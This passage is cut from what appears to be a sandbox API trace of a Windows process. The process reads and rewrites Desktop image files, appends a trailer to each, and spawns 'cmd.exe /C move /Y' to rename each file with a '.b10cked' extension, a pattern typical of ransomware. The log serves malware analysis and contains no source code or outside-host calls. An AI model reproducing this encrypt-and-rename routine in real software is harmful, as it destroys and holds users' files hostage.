lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4db8 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4db8 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x4db8 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4db8 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4db8 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4db8 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4db8 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4db8 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4db8 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.464] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x48d0 [0219.464] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.465] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.465] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.465] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x4db8 [0219.465] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.465] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.465] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.465] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x4db8 [0219.465] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.465] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.465] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x26db, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x26db, lpOverlapped=0x0) returned 1 [0219.465] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.466] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x26db, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x26db, lpOverlapped=0x0) returned 1 [0219.466] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-9947, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x26dd [0219.466] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x26db, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x26db, lpOverlapped=0x0) returned 1 [0219.466] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-9947, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x26dd [0219.466] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x26db, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x26db, lpOverlapped=0x0) returned 1 [0219.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9CDgy bLN0e-uZnqSYBc.bmp", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0219.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9CDgy bLN0e-uZnqSYBc.bmp", cchWideChar=24, lpMultiByteStr=0x132f7bc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="9CDgy bLN0e-uZnqSYBc.bmp", lpUsedDefaultChar=0x0) returned 24 [0219.470] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x4db8 [0219.470] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.470] CloseHandle (hObject=0x1b4) returned 1 [0219.471] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP") returned 0x25 [0219.471] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0219.471] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xe84, dwThreadId=0xfec)) returned 1 [0219.477] CloseHandle (hObject=0x120) returned 1 [0219.477] CloseHandle (hObject=0x1b4) returned 1 [0219.477] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.477] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.477] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 3 [0219.477] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.477] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.477] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0219.477] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.477] ReleaseMutex (hMutex=0xf8) returned 1 [0219.477] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.478] ReleaseMutex (hMutex=0xf8) returned 1 [0219.478] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.478] ReleaseMutex (hMutex=0xf8) returned 1 [0219.478] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.478] ReleaseMutex (hMutex=0xf8) returned 1 [0219.478] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png" (normalized: "c:\\users\\eebsym5\\desktop\\bcugg-6ytrmwdaph.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8199 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.478] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27626719013) returned 1 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8199 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8199 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x8199 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.478] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8199 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8199 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8199 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8199 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8199 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8199 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.479] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x7cb1 [0219.479] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.480] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.480] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.480] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x8199 [0219.480] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.480] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.480] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.480] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x8199 [0219.481] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.481] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.481] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x40cb, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x40cb, lpOverlapped=0x0) returned 1 [0219.481] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.481] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x40cb, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x40cb, lpOverlapped=0x0) returned 1 [0219.481] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-16587, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x40ce [0219.481] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x40cb, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x40cb, lpOverlapped=0x0) returned 1 [0219.481] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-16587, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x40ce [0219.481] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x40cb, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x40cb, lpOverlapped=0x0) returned 1 [0219.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BcUgG-6ytRMwdapH.png", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0219.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BcUgG-6ytRMwdapH.png", cchWideChar=20, lpMultiByteStr=0x1328834, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BcUgG-6ytRMwdapH.png", lpUsedDefaultChar=0x0) returned 20 [0219.485] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x8199 [0219.485] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.626] CloseHandle (hObject=0x1b4) returned 1 [0219.627] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG") returned 0x25 [0219.627] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0219.627] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xea4, dwThreadId=0xd48)) returned 1 [0219.721] CloseHandle (hObject=0x120) returned 1 [0219.721] CloseHandle (hObject=0x1b4) returned 1 [0219.721] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.721] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", 